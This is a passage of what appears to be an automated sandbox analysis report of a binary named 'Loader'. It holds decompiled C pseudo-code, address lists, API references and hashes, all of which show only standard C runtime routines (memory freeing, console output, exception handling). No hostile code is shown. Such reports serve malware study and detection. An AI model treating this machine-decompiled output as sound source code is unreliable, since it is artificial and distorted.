			}

0x00afbb4d
0x00afbb52
0x00afbb70
0x00afbb72
0x00afbb75
0x00afbba2
0x00afbbaa
0x00afbbac
0x00afbbc5
0x00afbbc8
0x00afbbcb
0x00afbbd9
0x00afbbe8
0x00afbbf0
0x00afbbf2
0x00afbc0b
0x00afbc0e
0x00afbc0e
0x00afbbf4
0x00afbbfb
0x00afbc06
0x00afbc06
0x00afbc10
0x00000000
0x00afbc10
0x00afbbd0
0x00afbbd5
0x00afbbd7
0x00000000
0x00000000
0x00000000
0x00afbbd7
0x00afbbb5
0x00000000
0x00afbbc0
0x00afbb77
0x00afbb7a
0x00afbb7d
0x00afbb90
0x00afbb93
0x00afbb66
0x00afbb66
0x00000000
0x00afbb69
0x00afbb83
0x00afbb88
0x00afbb8a
0x00afbc14
0x00afbc14
0x00000000
0x00afbb8a
0x00afbb54
0x00afbb59
0x00afbb5e
0x00afbb60
0x00afbb63
0x00000000

APIs

Part of subcall function 00AF0F88: _free.LIBCMT ref: 00AF0F96

Part of subcall function 00AFB701: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00AF7A29,?,00000000,00000000), ref: 00AFB7AD

GetLastError.KERNEL32 ref: 00AFBBAE
__dosmaperr.LIBCMT ref: 00AFBBB5
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00AFBBF4
__dosmaperr.LIBCMT ref: 00AFBBFB

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: ba6ac1e17ccbfb2ce448483b92cfc79e7c44e4d8851eaf3f9377c7bce6ec7cdf
Instruction ID: c10df497adc274d5bd5503c725090783dc240fe417e6f86df2ba38442caa9f51
Opcode Fuzzy Hash: ba6ac1e17ccbfb2ce448483b92cfc79e7c44e4d8851eaf3f9377c7bce6ec7cdf
Instruction Fuzzy Hash: 00219D7161060DAFDB20AFA6CD80D7BB7B8EF043A47108629FA1997551EB31EC518BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00AE79D2 Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00AE79D2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t36;
				void* _t41;
				intOrPtr* _t64;
				intOrPtr* _t75;
				intOrPtr* _t76;
				void* _t78;

				_t58 = __ebx;
				_push(8);
				E00AE961E(0xb0418b, __ebx, __edi, __esi);
				E00AE708B(_t78 - 0x14, 0);
				_t75 =  *0xb37c7c; // 0x0
				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
				 *((intOrPtr*)(_t78 - 0x10)) = _t75;
				_t36 = E00AE3D40( *((intOrPtr*)(_t78 + 8)), E00AE3400());
				_t73 = _t36;
				if(_t36 != 0) {
					L5:
					E00AE70E3(_t78 - 0x14);
					return E00AE95FB(_t73);
				} else {
					if(_t75 == 0) {
						_push( *((intOrPtr*)(_t78 + 8)));
						_push(_t78 - 0x10);
						_t41 = E00AE7EE1(__ebx, _t73, _t75, __eflags);
						_pop(_t64);
						__eflags = _t41 - 0xffffffff;
						if(__eflags == 0) {
							E00AE4280(__ebx, __edx, __eflags);
							asm("int3");
							_push(8);
							E00AE961E(0xb041c9, __ebx, _t73, _t75);
							_t76 = _t64;
							 *((intOrPtr*)(_t78 - 0x14)) = _t76;
							 *((intOrPtr*)(_t78 - 0x10)) = 0;
							__eflags =  *((intOrPtr*)(_t78 + 0x10));
							if( *((intOrPtr*)(_t78 + 0x10)) != 0) {
								 *_t76 = 0xb06fd4;
								 *((intOrPtr*)(_t76 + 0x10)) = 0;
								 *((intOrPtr*)(_t76 + 0x30)) = 0;
								 *((intOrPtr*)(_t76 + 0x34)) = 0;
								 *((intOrPtr*)(_t76 + 0x38)) = 0;
								 *((intOrPtr*)(_t76 + 8)) = 0xb06fc8;
								 *(_t78 - 4) = 0;
								 *((intOrPtr*)(_t78 - 0x10)) = 1;
							}
							 *((intOrPtr*)(_t76 +  *((intOrPtr*)( *_t76 + 4)))) = 0xb06fd0;
							_t28 =  *((intOrPtr*)( *_t76 + 4)) - 8; // -8
							 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 4)) + _t76 - 4)) = _t28;
							__eflags =  *((intOrPtr*)( *_t76 + 4)) + _t76;
							E00AE81EC(_t58,  *((intOrPtr*)( *_t76 + 4)) + _t76, _t73,  *((intOrPtr*)( *_t76 + 4)) + _t76,  *((intOrPtr*)(_t78 + 8)),  *((intOrPtr*)(_t78 + 0xc)));
							return E00AE95FB(_t76);
						} else {
							_t73 =  *((intOrPtr*)(_t78 - 0x10));
							 *((intOrPtr*)(_t78 - 0x10)) = _t73;
							 *(_t78 - 4) = 1;
							E00AE73D6(__eflags, _t73);
							 *0xb05148();
							 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 4))))();
							 *0xb37c7c = _t73;
							goto L5;
						}
					} else {
						_t73 = _t75;
						goto L5;
					}
				}
			}

0x00ae79d2
0x00ae79d2
0x00ae79d9
0x00ae79e3
0x00ae79e8
0x00ae79f3
0x00ae79f7
0x00ae7a03
0x00ae7a08
0x00ae7a0c
0x00ae7a51
0x00ae7a54
0x00ae7a60
0x00ae7a0e
0x00ae7a10
0x00ae7a16
0x00ae7a1c
0x00ae7a1d
0x00ae7a23
0x00ae7a24
0x00ae7a27
0x00ae7a61
0x00ae7a66
0x00ae7a67
0x00ae7a6e
0x00ae7a73
0x00ae7a75
0x00ae7a7a
0x00ae7a7d
0x00ae7a80
0x00ae7a82
0x00ae7a88
0x00ae7a8b
0x00ae7a8e
0x00ae7a91
0x00ae7a94
0x00ae7a9b
0x00ae7a9e
0x00ae7a9e
0x00ae7ab0
0x00ae7abc
0x00ae7abf
0x00ae7ac8
0x00ae7aca
0x00ae7ad6
0x00ae7a29
0x00ae7a29
0x00ae7a2c
0x00ae7a30
0x00ae7a34
0x00ae7a41
0x00ae7a49
0x00ae7a4b
0x00000000
0x00ae7a4b
0x00ae7a12
0x00ae7a12
0x00000000
0x00ae7a12
0x00ae7a10

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00AE79E3

Part of subcall function 00AE3400: std::_Lockit::_Lockit.LIBCPMT ref: 00AE340F
Part of subcall function 00AE3400: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE342A

codecvt.LIBCPMT ref: 00AE7A1D
std::_Facet_Register.LIBCPMT ref: 00AE7A34
std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7A54

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Registercodecvt
String ID:
API String ID: 2219260569-0
Opcode ID: be78bebda8efbf3fa7e48131d2a3db437064e6ee9f572847f9edf875ef48e5f1
Instruction ID: 8b7f41cfecf55571e66e6dfa3d4e3b7f001304b62a03c7d7f184bee1bac600a9
Opcode Fuzzy Hash: be78bebda8efbf3fa7e48131d2a3db437064e6ee9f572847f9edf875ef48e5f1
Instruction Fuzzy Hash: 9D01F5769081999FCF11EB62CA45ABEBBB5EF44320F240449F410AB3C1DF70DE018B81

Uniqueness

Uniqueness Score: -1.00%

Function 00B0309C Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00B0309C(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xb375e0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00B03085();
					E00B03047();
					_t13 = WriteConsoleW( *0xb375e0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x00b030b9
0x00b030bd
0x00b030ca
0x00b030cf
0x00b030ea
0x00b030ea
0x00b030f0

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00B01707,00000000,00000001,00000000,00000000,?,00AF82E5,?,?,00000000), ref: 00B030B3
GetLastError.KERNEL32(?,00B01707,00000000,00000001,00000000,00000000,?,00AF82E5,?,?,00000000,?,00000000,?,00AF8831,?), ref: 00B030BF

Part of subcall function 00B03085: CloseHandle.KERNEL32(FFFFFFFE,00B030CF,?,00B01707,00000000,00000001,00000000,00000000,?,00AF82E5,?,?,00000000,?,00000000), ref: 00B03095

___initconout.LIBCMT ref: 00B030CF

Part of subcall function 00B03047: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B03076,00B016F4,00000000,?,00AF82E5,?,?,00000000,?), ref: 00B0305A

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00B01707,00000000,00000001,00000000,00000000,?,00AF82E5,?,?,00000000,?), ref: 00B030E4

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0da281ba9daeccd445dac2efe37de9016bd7b4de9829a040110b4ed7edf992e6
Instruction ID: 68b3489c45092cc270abe7796345494e6abb77d8ad68113190e757e876088b2d
Opcode Fuzzy Hash: 0da281ba9daeccd445dac2efe37de9016bd7b4de9829a040110b4ed7edf992e6
Instruction Fuzzy Hash: A0F01C36102118BBCF322F95DC08A9E3FAAFB18BA0F154050FA5996560EA3289209B90

Uniqueness

Uniqueness Score: -1.00%

Function 00AF3A18 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AF3A18() {

				E00AF4AEF( *0xb38524);
				 *0xb38524 = 0;
				E00AF4AEF( *0xb38528);
				 *0xb38528 = 0;
				E00AF4AEF( *0xb384e4);
				 *0xb384e4 = 0;
				E00AF4AEF( *0xb384e8);
				 *0xb384e8 = 0;
				return 1;
			}

0x00af3a21
0x00af3a2e
0x00af3a34
0x00af3a3f
0x00af3a45
0x00af3a50
0x00af3a56
0x00af3a5e
0x00af3a67

APIs

_free.LIBCMT ref: 00AF3A21

Part of subcall function 00AF4AEF: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?), ref: 00AF4B05
Part of subcall function 00AF4AEF: GetLastError.KERNEL32(?,?,00AFD965,?,00000000,?,00000002,?,00AFDC08,?,00000007,?,?,00AFE0FB,?,?), ref: 00AF4B17

_free.LIBCMT ref: 00AF3A34
_free.LIBCMT ref: 00AF3A45
_free.LIBCMT ref: 00AF3A56

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c02f82d7ea7ac339ab078a378c5ef1bcb75a695acc75ec973c02f747ca2105ad
Instruction ID: df0403b4bd34e6d5f96632b5e8f9901413c3045bbcc1a160ee33819f984b54af
Opcode Fuzzy Hash: c02f82d7ea7ac339ab078a378c5ef1bcb75a695acc75ec973c02f747ca2105ad
Instruction Fuzzy Hash: 71E04679800724ABCA62BFA9FE0145F7B66E71C7613220006F1200B332DF315B529ADB

Uniqueness

Uniqueness Score: -1.00%

Function 00AF0C6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00AF0CFD

Strings

pow, xrefs: 00AF0CD5, 00AF0CF2

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 96aaa833fe2a81495bfc3015c37f631753fa1b361b378c635c952ff2931e6064
Instruction ID: 6533a0f64515b47fcde405704f821298d943e8dd11bf64bdd67e1098cb58d9ab
Opcode Fuzzy Hash: 96aaa833fe2a81495bfc3015c37f631753fa1b361b378c635c952ff2931e6064
Instruction Fuzzy Hash: 94518D71A2420D9ADB1177D4CE11B7F7BB4EB90740F304E58F2D5422AAEF348C85DA9A

Uniqueness

Uniqueness Score: -1.00%

Function 00AEBB60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00AEBB60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E00B04082(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0xb36bac;
				E00AEBB20(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0xb36bac);
				E00AECBEC(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E00AECD70(_t77, 0xfffffffe, _t96, 0xb36bac);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E00AECD10(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E00AEBB20(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0xb071cc;
											if(__eflags != 0) {
												_t72 = E00B03950(__eflags, 0xb071cc);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0xb071cc; // 0xaeaa4e
													 *0xb05148(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E00AECD50(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E00AECD70(_t64, _t93, _t96, 0xb36bac);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E00AEBB20(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E00AECD30();
										asm("int3");
										__eflags = E00AECD87();
										if(__eflags != 0) {
											_t67 = E00AEBE23(_t86, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E00AECDC3();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x00aebb60
0x00aebb67
0x00aebb6b
0x00aebb6c
0x00aebb72
0x00aebb7e
0x00aebb80
0x00aebb86
0x00aebb86
0x00aebb8f
0x00aebb91
0x00aebb94
0x00aebb97
0x00aebb9f
0x00aebba4
0x00aebba7
0x00aebbaa
0x00aebbb1
0x00aebc0d
0x00aebc10
0x00aebc18
0x00aebc1f
0x00000000
0x00aebc1f
0x00000000
0x00aebbb3
0x00aebbb3
0x00aebbb9
0x00aebbbf
0x00aebbc5
0x00aebc30
0x00aebc39
0x00aebbc7
0x00aebbc7
0x00aebbc7
0x00aebbcd
0x00aebbd0
0x00aebbd3
0x00aebbd6
0x00aebbd9
0x00aebbde
0x00aebbf4
0x00000000
0x00aebbe0
0x00aebbe0
0x00aebbe2
0x00aebbe7
0x00aebbe9
0x00aebbec
0x00aebbee
0x00aebc04
0x00aebc24
0x00aebc24
0x00aebc28
0x00000000
0x00aebbf0
0x00aebbf0
0x00aebc3a
0x00aebc3d
0x00aebc43
0x00aebc45
0x00aebc4c
0x00aebc53
0x00aebc58
0x00aebc5b
0x00aebc5d
0x00aebc5f
0x00aebc6c
0x00aebc72
0x00aebc74
0x00aebc77
0x00aebc77
0x00aebc7a
0x00aebc7a
0x00aebc4c
0x00aebc80
0x00aebc82
0x00aebc87
0x00aebc8a
0x00aebc8d
0x00aebc95
0x00aebc99
0x00aebc9e
0x00aebc9e
0x00aebca1
0x00aebca5
0x00aebca8
0x00aebcb5
0x00aebcb8
0x00aebcbd
0x00aebcc3
0x00aebcc5
0x00aebcca
0x00aebccf
0x00aebcd1
0x00aebcdc
0x00aebcd3
0x00aebcd3
0x00000000
0x00aebcd3
0x00aebcc7
0x00aebcc7
0x00aebcc7
0x00aebcc9
0x00aebcc9
0x00aebbf2
0x00000000
0x00aebbf2
0x00aebbf0
0x00aebbee
0x00000000
0x00aebbf7
0x00aebbf7
0x00aebbf9
0x00aebc00
0x00000000
0x00aebc02
0x00000000
0x00aebc00
0x00aebbc5
0x00000000

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00AEBB9F
__IsNonwritableInCurrentImage.LIBCMT ref: 00AEBC53

Strings

csm, xrefs: 00AEBC3D

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: af6795c5ed7111ce47d6058f11ffe1f916be5f31d184f714fe95d17f6843d525
Instruction ID: f461ac9e033a011bff160c5860ea683de6dbe139bf1de44700990839f01ff636
Opcode Fuzzy Hash: af6795c5ed7111ce47d6058f11ffe1f916be5f31d184f714fe95d17f6843d525
Instruction Fuzzy Hash: CE41AA349142599FCF10DF6ACC89A9FBFB5AF45314F148095E814AB392DB31AD01CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AEC472 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E00AEC472(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_t75 = E00AEBD4C(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00AEBD4C(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00AEA068(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00AE9F9B(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00AEC048(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E00AF0E59(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x00aec472
0x00aec472
0x00aec479
0x00aec482
0x00aec5a1
0x00aec488
0x00aec48a
0x00aec494
0x00aec497
0x00aec49d
0x00aec4a7
0x00aec4cc
0x00aec4d1
0x00aec4d6
0x00aec59d
0x00000000
0x00aec59e
0x00aec4d6
0x00aec4a7
0x00aec4dc
0x00aec4df
0x00aec4e2
0x00aec4e8
0x00aec4ee
0x00aec500
0x00aec505
0x00aec508
0x00aec50b
0x00aec50e
0x00aec511
0x00aec517
0x00aec51d
0x00aec520
0x00aec523
0x00aec532
0x00aec533
0x00aec533
0x00aec538
0x00aec54b
0x00aec54d
0x00aec552
0x00aec55d
0x00aec55f
0x00aec561
0x00aec57d
0x00aec582
0x00aec585
0x00aec585
0x00aec55d
0x00aec552
0x00aec58b
0x00aec58c
0x00aec58f
0x00aec592
0x00aec595
0x00aec598
0x00aec523
0x00000000
0x00aec517
0x00aec5a2
0x00aec5a7
0x00aec5ab
0x00aec5ae
0x00aec5af
0x00aec5b0
0x00aec5b1
0x00aec5b6
0x00aec62e
0x00aec630
0x00aec5b8
0x00aec5b8
0x00aec5be
0x00000000
0x00aec5c0
0x00aec5c3
0x00aec5c6
0x00aec5cd
0x00aec5d0
0x00aec5d4
0x00aec606
0x00aec609
0x00aec610
0x00aec616
0x00aec620
0x00aec629
0x00aec629
0x00aec620
0x00aec616
0x00aec62a
0x00aec5d6
0x00aec5d6
0x00aec5d6
0x00aec5d9
0x00aec5d9
0x00aec5dd
0x00000000
0x00000000
0x00aec5e1
0x00aec5f5
0x00aec5f5
0x00aec5e3
0x00aec5e3
0x00aec5e9
0x00000000
0x00aec5eb
0x00aec5eb
0x00aec5ee
0x00aec5f3
0x00000000
0x00000000
0x00000000
0x00000000
0x00aec5f3
0x00aec5e9
0x00aec5fe
0x00aec600
0x00000000
0x00aec602
0x00aec602
0x00aec602
0x00000000
0x00aec600
0x00aec5f9
0x00aec5fb
0x00000000
0x00aec5fb
0x00000000
0x00000000
